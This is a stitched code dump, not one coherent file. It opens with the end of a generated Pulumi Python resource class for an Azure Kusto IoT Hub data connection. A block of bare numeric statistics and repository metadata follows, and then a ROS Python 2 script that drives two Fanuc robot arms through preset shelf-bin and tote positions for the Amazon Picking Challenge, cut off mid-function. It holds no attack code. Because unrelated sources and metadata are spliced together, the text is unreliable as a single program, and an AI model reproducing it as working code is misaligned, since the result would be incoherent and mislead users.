if consumer_group is None and not opts.urn:
raise TypeError("Missing required property 'consumer_group'")
__props__.__dict__["consumer_group"] = consumer_group
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__.__dict__["database_name"] = database_name
__props__.__dict__["event_system_properties"] = event_system_properties
if iothub_id is None and not opts.urn:
raise TypeError("Missing required property 'iothub_id'")
__props__.__dict__["iothub_id"] = iothub_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if shared_access_policy_name is None and not opts.urn:
raise TypeError("Missing required property 'shared_access_policy_name'")
__props__.__dict__["shared_access_policy_name"] = shared_access_policy_name
super(IotHubDataConnection, __self__).__init__(
'azure:kusto/iotHubDataConnection:IotHubDataConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
consumer_group: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
event_system_properties: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
iothub_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
shared_access_policy_name: Optional[pulumi.Input[str]] = None) -> 'IotHubDataConnection':
"""
Get an existing IotHubDataConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[str] consumer_group: Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] event_system_properties: Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
:param pulumi.Input[str] iothub_id: Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: The location where the Kusto Database should be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] shared_access_policy_name: Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _IotHubDataConnectionState.__new__(_IotHubDataConnectionState)
__props__.__dict__["cluster_name"] = cluster_name
__props__.__dict__["consumer_group"] = consumer_group
__props__.__dict__["database_name"] = database_name
__props__.__dict__["event_system_properties"] = event_system_properties
__props__.__dict__["iothub_id"] = iothub_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["shared_access_policy_name"] = shared_access_policy_name
return IotHubDataConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Kusto Cluster this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="consumerGroup")
def consumer_group(self) -> pulumi.Output[str]:
"""
Specifies the IotHub consumer group this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "consumer_group")
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Kusto Database this data connection will be added to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@property
@pulumi.getter(name="eventSystemProperties")
def event_system_properties(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Specifies the System Properties that each IoT Hub message should contain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "event_system_properties")
@property
@pulumi.getter(name="iothubId")
def iothub_id(self) -> pulumi.Output[str]:
"""
Specifies the resource id of the IotHub this data connection will use for ingestion. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "iothub_id")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the Kusto Database should be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Kusto IotHub Data Connection to create. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
Specifies the Resource Group where the Kusto Database should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="sharedAccessPolicyName")
def shared_access_policy_name(self) -> pulumi.Output[str]:
"""
Specifies the IotHub Shared Access Policy this data connection will use for ingestion, which must have read permission. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "shared_access_policy_name")
| 52.153251
| 256
| 0.683061
| 4,114
| 33,691
| 5.378707
| 0.056393
| 0.066612
| 0.075289
| 0.054094
| 0.91748
| 0.904646
| 0.895201
| 0.875452
| 0.864742
| 0.858957
| 0
| 0.003525
| 0.233653
| 33,691
| 645
| 257
| 52.234109
| 0.853519
| 0.452109
| 0
| 0.694444
| 1
| 0
| 0.120349
| 0.041508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160494
| false
| 0.003086
| 0.015432
| 0
| 0.271605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f787a30d0d26df2b3eeed001487cdcfeea9cd5e0
| 44,533
|
py
|
Python
|
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | 7
|
2016-09-04T02:07:04.000Z
|
2017-05-25T02:31:07.000Z
|
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | null | null | null |
script/arm_control.py
|
amazon-picking-challenge/team_pfn
|
2f76524b067d816d8407f6c4fae4e6d33939c024
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2016 Preferred Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import rospy
from std_msgs.msg import String
from std_msgs.msg import Bool
from std_msgs.msg import Int16
from geometry_msgs.msg import Twist, Vector3, Point
from std_srvs.srv import Empty
import time
import random
import math
import roslib
import actionlib
from actionlib_msgs.msg import GoalStatus
from apc2016.msg import *
from apc2016.srv import *
import util
class LeftRight_arm:
def __init__(self, lr, w0=480, h0=360, with_vac=True): #lr=('left' or 'right')
rospy.loginfo("initialising %s arm" % lr)
self.pub = rospy.Publisher( lr+'_state', String , queue_size = 10, latch=True)
msg = String()
#msg.data = "workspace"
#self.pub.publish(msg)
# calc_x: 1235, -207, 559
# tool_x: 790, -231, 515
#self.hosei = np.asarray([790-1235+30,(-231)-(-207),515-559+0,0,0,0])
# calc_x: 494, -181, 913
# tool_x: 666, -29, 415
self.hosei = np.asarray([666-494,(-29)-(-181),415-913+0,0,0,0])
self.lr = lr
lr_offset = 0
lr_roll = 0
lr_yaw = 0
if lr == 'right':
lr_offset = 0
# lr_roll = -180
# lr_yaw = -360
self.preset_position = {}
dy = [0, -280, -560]
# dz = [0, -250, -480, -730]
dz = [0, -265, -494, -723]
# 72
if lr == 'left':
self.preset_position["bin_A_photo"] = np.asarray([775+0-50,lr_offset-102-20,690,180,-20,179.9])#-170])
else:
self.preset_position["bin_A_photo"] = np.asarray([775+50,lr_offset-102-20,720,180,-20,0])#-170])
self.preset_position["bin_B_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_photo"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
if lr == 'left':
self.preset_position["bin_A_photo_r"] = np.asarray([810-50,lr_offset-356,690,180,-20,-160])
else:
self.preset_position["bin_A_photo_r"] = np.asarray([810,lr_offset-356,720,180,-20,20])
self.preset_position["bin_B_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_photo_r"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[0], 0, 0, -350])
self.preset_position["bin_D_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_photo_r"] = self.preset_position["bin_A_photo_r"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
if lr == 'left':
self.preset_position["bin_A_photo_l"] = np.asarray([810-50,lr_offset+114,690,180,-20,160])
else:
self.preset_position["bin_A_photo_l"] = np.asarray([810,lr_offset+154,720,180,-20,-20])
self.preset_position["bin_B_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_photo_l"] = self.preset_position["bin_A_photo_l"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
self.preset_position["bin_A_pre"] = np.asarray([550,lr_offset-102,713,180+lr_yaw,-0.1,179.9+lr_roll])
self.preset_position["bin_B_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_pre"] = self.preset_position["bin_A_pre"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
self.preset_position["bin_A_rpre"] = np.asarray([550,lr_offset-102,713, -180, 0, 0])
self.preset_position["bin_B_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_rpre"] = self.preset_position["bin_A_rpre"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
self.preset_position["bin_A_front"] = np.asarray([432,lr_offset-87,483,90,-90,90])
self.preset_position["bin_B_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_front"] = self.preset_position["bin_A_front"] + np.asarray([50, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_front"] = self.preset_position["bin_A_front"] + np.asarray([50, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_front"] = self.preset_position["bin_A_front"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
self.preset_position["bin_A_pull"] = np.asarray([432,lr_offset-87,560-40,90,-90,90]) #TODO takasugi??
self.preset_position["bin_B_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[1], dz[0], 0, 0, 0])
self.preset_position["bin_C_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[2], dz[0], 0, 0, 0])
self.preset_position["bin_D_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[0], dz[1], 0, 0, 0])
self.preset_position["bin_E_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[1], dz[1], 0, 0, 0])
self.preset_position["bin_F_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[2], dz[1], 0, 0, 0])
self.preset_position["bin_G_pull"] = self.preset_position["bin_A_pull"] + np.asarray([50, dy[0], dz[2], 0, 0, 0])
self.preset_position["bin_H_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[1], dz[2], 0, 0, 0])
self.preset_position["bin_I_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[2], dz[2], 0, 0, 0])
self.preset_position["bin_J_pull"] = self.preset_position["bin_A_pull"] + np.asarray([50, dy[0], dz[3], 0, 0, 0])
self.preset_position["bin_K_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[1], dz[3], 0, 0, 0])
self.preset_position["bin_L_pull"] = self.preset_position["bin_A_pull"] + np.asarray([0, dy[2], dz[3], 0, 0, 0])
self.preset_position["origin"] = np.asarray([550,lr_offset-146,752,180,0,180])
self.preset_position["tote"] = np.asarray([800, 620, 260, -180, 0, 0])
self.preset_position["tote_photo"] = np.asarray([800, 620, 260-30, 0, -90, -180])
self.preset_position["tote_photo_xm"] = np.asarray([466, 620, 255-30, 0, -70, 180])
self.preset_position["tote_photo_xp"] = np.asarray([1094, 620, 255-30, 180, -70, 0])
self.preset_position["tote_photo_ym"] = np.asarray([800, 290, 255-30, -90, -70, -90])
self.preset_position["tote_photo_yp"] = np.asarray([800, 980, 255-30, 90, -70, 90])
#TODO
#self.preset_position["escape_right"] = np.asarray([305.607,-1276,463,-179.9,0.1,0.1])
self.preset_position["escape_right"] = np.asarray([258,-1337,458,-179.9,0.1,114])
self.preset_position["escape_left"] = np.asarray([599,1164,3,-177,-2,-173])
rospy.loginfo("action client start")
print 'move_arm_' + lr
self.action_client = actionlib.SimpleActionClient('move_arm_' + lr, RobotArmMoveGlobalAction)
self.action_client.wait_for_server()
rospy.loginfo("%s arm action ok" % lr)
# avoid collision between hand and shelf
# inside_bin_check([1,2,3],'bin_C')
@staticmethod
def inside_bin_check(target, bin):
#print 'inside bin check, target = ', target, 'bin = ', bin
bin_name = bin[-1]
#print 'target = ',target
xlim = (0-1000, 445-600) # (650, 1045)
if bin_name in ['A', 'D', 'G', 'J']:
ylim = (-230, -15)
elif bin_name in ['B', 'E', 'H', 'K']:
ylim = (-285, -15)
elif bin_name in ['C', 'F', 'I', 'L']:
ylim = (-235, -15)
if bin_name in ['A', 'B', 'C']:
zlim = (20,210)
elif bin_name in ['D', 'E', 'F']:
zlim = (20,170)
elif bin_name in ['G','H','I']:
zlim = (20, 170)
elif bin_name in ['J','K','L']:
zlim = (20,210)
reject = False
#print target[:]
if target[0] < xlim[0]:
print "rejected by x< limit"
reject = True
if target[0] > xlim[1]:
print "rejected by x> limit"
reject = True
if target[1] < ylim[0]: #-570:
print "rejected by y< limit"
reject = True
if target[1] > ylim[1]: #-350:
print "rejected by y> limit"
reject = True
if target[2] < zlim[0]:
print "rejected by z< limit"
reject = True
if target[2] > zlim[1]:
print "rejected by z> limit"
reject = True
return not reject
# avoid collision between hand and tote
# inside_bin_check([1,2,3])
@staticmethod
def inside_tote_check(target):
xlim = (650, 930)
ylim = (390, 870)
zlim = (-130, 200)
reject = False
if target[0] < xlim[0]:
print "rejected by x< limit"
reject = True
if target[0] > xlim[1]:
print "rejected by x> limit"
reject = True
if target[1] < ylim[0]:
print "rejected by y< limit"
reject = True
if target[1] > ylim[1]:
print "rejected by y> limit"
reject = True
if target[2] < zlim[0]:
print "rejected by z< limit"
reject = True
if target[2] > zlim[1]:
print "rejected by z> limit"
reject = True
return not reject
# avoid collision between hand and shelf
# inside_bin_check([1,2,3],'bin_C')
@staticmethod
def inside_bin_check_global(target, bin):
bin_name = bin[-1]
#print 'target = ',target
xlim = (600, 1045) # (650, 1045)
if bin_name in ['A', 'D', 'G', 'J']:
ylim = (-195, 7)
elif bin_name in ['B', 'E', 'H', 'K']:
ylim = (-495, -249)
elif bin_name in ['C', 'F', 'I', 'L']:
ylim = (-745, -554)
if bin_name in ['A', 'B', 'C']:
zlim = (392,571)
elif bin_name in ['D', 'E', 'F']:
zlim = (162,309)
elif bin_name in ['G','H','I']:
zlim = (-68, 82)
elif bin_name in ['J','K','L']:
zlim = (-331,-145)
reject = False
#print target[:]
if target[0] < xlim[0]:
print "rejected by x< limit"
reject = True
if target[0] > xlim[1]:
print "rejected by x> limit"
reject = True
if target[1] < ylim[0]: #-570:
#print "rejected by y< limit"
reject = True
if target[1] > ylim[1]: #-350:
#print "rejected by y> limit"
reject = True
if target[2] < zlim[0]:
#print "rejected by z< limit"
reject = True
if target[2] > zlim[1]:
#print "rejected by z> limit"
reject = True
return not reject
# pos: numpy array (shape (6)) xyzwpr
def send_msg_and_wait(self, pos, fut000 = 1, kakujiku = 1):
print 'send message to %s arm: %s' % (self.lr, pos)
print 'fut000=', fut000, 'kakujiku = ',kakujiku
goal = RobotArmMoveGlobalGoal(target=FanucTwist(Vector3(pos[0],pos[1],pos[2]), Vector3(pos[3],pos[4],pos[5]), fut000, kakujiku))
self.action_client.send_goal(goal)
done_before_timeout = self.action_client.wait_for_result(rospy.Duration.from_sec(1400.0))
# error check
if not done_before_timeout:
rospy.logerr("robot arm move did not finish in time")
raise util.RobotTimeoutException(self.lr, goal)
state = self.action_client.get_state()
if state != GoalStatus.SUCCEEDED:
rospy.logerr("robot move action did not finish correctly")
raise util.RobotActionFailure(self.lr, goal, state)
result = self.action_client.get_result()
if not result.success:
rospy.logerr("robot arm did not move correctly")
raise util.RobotMoveFailure(self.lr, goal)
result = self.action_client.get_result()
status = self.action_client.get_state()
rospy.loginfo("result %s status %s"%(result, status))
self.current_position = pos
# usage
# move_position('bin_A', 'photo')
def move_position(self, bin_name, fut000 = 1, kakujiku = 1, pos=''):
rospy.loginfo("move %s %s fut = %s kakujiku = %s"%(bin_name, pos, fut000, kakujiku))
if bin_name=='origin':
self.send_msg_and_wait(self.preset_position['origin'], fut000, kakujiku)
elif bin_name=='tote':
self.send_msg_and_wait(self.preset_position['tote'], fut000, kakujiku)
elif 'tote' in bin_name:
self.send_msg_and_wait(self.preset_position[bin_name], fut000, kakujiku)
else:
x = self.preset_position['%s_%s'%(bin_name, pos)]
self.send_msg_and_wait(x, fut000, kakujiku)
#TODO
# usage
# go_to_safe_area()
def go_to_safe_area(self):
rospy.loginfo("move %s arm to safe area"%(self.lr))
if self.lr=='right':
self.send_msg_and_wait(self.preset_position['bin_F_pre'],12,0)
self.send_msg_and_wait(self.preset_position['escape_right'],12,0)
else:
self.send_msg_and_wait(self.preset_position['bin_D_pre'],12,0)
self.send_msg_and_wait(self.preset_position['escape_left'],12,0)
msg = String()
msg.data = "safe"
self.pub.publish(msg)
def return_from_safe_area(self):
rospy.loginfo("move %s arm to work space"%(self.lr))
if self.lr=='right':
self.send_msg_and_wait(self.preset_position['bin_F_pre'],12,1)
else:
self.send_msg_and_wait(self.preset_position['bin_D_pre'],12,1)
msg = String()
msg.data = "workspace"
self.pub.publish(msg)
class ArmControl(object):
def __init__(self):
self.left = LeftRight_arm('left')
self.right = LeftRight_arm('right')
self.srv_lowlevel_left = \
actionlib.SimpleActionServer('move_to_left',
RobotArmMoveAction,
execute_cb=self.cb_move_to_left,
auto_start=False)
self.srv_lowlevel_left_g = \
actionlib.SimpleActionServer('move_to_left_global',
RobotArmMoveGlobalAction,
execute_cb=self.cb_move_to_left_global,
auto_start=False)
self.srv_highlevel_left = \
actionlib.SimpleActionServer('move_to_bin_left',
BinToteMoveAction,
execute_cb=self.cb_move_to_bin_left,
auto_start=False)
self.srv_highlevel_left_g = \
actionlib.SimpleActionServer('move_to_bin_left_global',
BinToteMoveAction,
execute_cb=self.cb_move_to_bin_left_global,
auto_start=False)
#self.right = LeftRight_arm('right')
self.srv_lowlevel_right = \
actionlib.SimpleActionServer('move_to_right',
RobotArmMoveAction,
execute_cb=self.cb_move_to_right,
auto_start=False)
self.srv_lowlevel_right_g = \
actionlib.SimpleActionServer('move_to_right_global',
RobotArmMoveGlobalAction,
execute_cb=self.cb_move_to_right_global,
auto_start=False)
self.srv_highlevel_right = \
actionlib.SimpleActionServer('move_to_bin_right',
BinToteMoveAction,
execute_cb=self.cb_move_to_bin_right,
auto_start=False)
self.srv_highlevel_right_g = \
actionlib.SimpleActionServer('move_to_bin_right_global',
BinToteMoveAction,
execute_cb=self.cb_move_to_bin_right_global,
auto_start=False)
self.srv_lowlevel_left.start()
self.srv_lowlevel_left_g.start()
self.srv_highlevel_left.start()
self.srv_highlevel_left_g.start()
self.srv_lowlevel_right.start()
self.srv_lowlevel_right_g.start()
self.srv_highlevel_right.start()
self.srv_highlevel_right_g.start()
rospy.loginfo("initialize node")
rospy.wait_for_service('global2bin')
rospy.wait_for_service('bin2global')
rospy.wait_for_service('adjustglobal')
rospy.wait_for_service('check_is_calibrated')
rospy.loginfo('raeday to use coord transform service')
self.global2bin = rospy.ServiceProxy('global2bin',CoordinateTransform)
self.bin2global = rospy.ServiceProxy('bin2global',CoordinateTransform)
self.adjustglobal = rospy.ServiceProxy('adjustglobal', CoordinateTransform)
self.checkcalib = rospy.ServiceProxy('check_is_calibrated', CalibData)
self.r_state = ""
self.l_state = ""
self.sub_l = rospy.Subscriber('left_state', String ,self.cb_left_movement)
self.sub_r = rospy.Subscriber('right_state', String ,self.cb_right_movement)
#self.l_state = 'safe'
#self.r_state = 'safe'
def twist2str(self, t):
try:
return "lin:(%s, %s, %s)/ang:(%s, %s, %s)/fut000:%s/k:%s" % (t.linear.x,
t.linear.y,
t.linear.z,
t.angular.x,
t.angular.y,
t.angular.z,
t.fut000,
t.kakujiku)
except:
return "lin:(%s, %s, %s)/ang:(%s, %s, %s)" % (t.linear.x,
t.linear.y,
t.linear.z,
t.angular.x,
t.angular.y,
t.angular.z)
def cb_left_movement(self, message):
rospy.loginfo("SET LEFT STATE TO " + message.data)
self.l_state = message.data
def cb_right_movement(self, message):
rospy.loginfo("SET RIGHT STATE TO " + message.data)
self.r_state = message.data
def left_preparation(self):
if self.r_state == 'workspace':
rospy.loginfo('move right arm')
self.right.go_to_safe_area()
if self.l_state == 'safe':
rospy.loginfo('move left arm')
self.left.return_from_safe_area()
def right_preparation(self):
#return
if self.l_state == 'workspace':
self.left.go_to_safe_area()
if self.r_state == 'safe':
self.right.return_from_safe_area()
#RobotArmMove bin, target(twist) -> success
def cb_move_to_left(self, goal):
print "move_to_left:", self.twist2str(goal.target)
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result, errmsg)
return
r = self.bin2global(bin = goal.bin, point=goal.target)
if not r.is_calibrated:
raise util.RobotNotCalibrated("left", str(goal.target))
t = r.point
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
print 'go to', pos
try:
self.left.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result, errmsg)
return
if r.success == True:
result = RobotArmMoveResult(success=True)
self.srv_lowlevel_left.set_succeeded(result)
else:
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result,"Cannot convert position")
#RobotArmMoveGlobal target(twist)->success
def cb_move_to_left_global(self, goal):
print "move_to_left_global:", self.twist2str(goal.target)
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
